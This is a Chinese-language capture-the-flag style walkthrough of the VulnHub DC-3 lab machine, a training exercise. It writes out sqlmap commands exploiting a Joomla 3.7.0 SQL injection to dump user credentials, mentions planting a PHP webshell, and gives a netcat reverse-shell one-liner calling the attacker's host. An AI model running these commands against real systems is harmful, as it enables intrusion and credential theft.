vulnhub靶场，DC-3

vulnhub靶场，DC-3

环境准备

靶机下载地址：https://www.vulnhub.com/entry/dc-32,312/
攻击机：kali（192.168.58.130）
靶机：DC-3（192.168.58.146）
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.58.146
使用nmap扫描查看目标靶机端口开放情况

可以看到目标靶机只开放了80端口
浏览器访问目标靶机80端口，使用浏览器插件Wappalyzer查看网站基本信息

可以看到网站CMS为joomla，可以使用JoomScan（一款开源的OWASP的 Joomla ( CMS ) 漏洞扫描器）进行漏洞扫描

joomscan --url http://192.168.58.146/ #进行漏洞扫描

成功获得网站CMS具体版本信息和后台登入地址

查看kali的漏洞库，看看Joomla 3.7.0是否存在漏洞

发现确实存在一个SQL注入漏洞，查看这个漏洞描述

存在SQL注入的url为：http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

渗透过程

前面信息收集已经确定了存在SQL注入的url，使用sqlmap进行自动化注入，查看当前库

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

查看joomladb库下的所有表

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

查看#__users表下的所有字段

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

查看username、password字段的值

sqlmap -u "http://192.168.58.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "username,password" --dump -p list[fullordering]

密码是加密了的，将密码存到一个文件里，使用john去解密

成功获得密码，试试能不能登入网站后台

成功进入后台，看看是否有能上传文件的位置

发现这个位置是可以随便更改源码的，也可以上传文件
新建文件icepeak.php，内容为一句话木马

保存后使用蚁剑连接，连接成功

使用nc进行反弹shell
kali终端中：

蚁剑终端中：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.58.130 1234 >/tmp/f

可以看到kali这边成功反弹到一个shell

权限提升

cat /etc/issue #查看版本当前操作系统发行版信息

查找Ubuntu 16.04存在的漏洞

这里可以利用39772提权，将exp下载到本地
开启kali的apache服务，将39772.zip放在网站根目录下面

靶机下载39772.zip，进行解压

进入39772目录，将exploit.tar进行解压

运行以下两个文件即可

成功提升权限为root，在root根目录下找到flag，靶机渗透完成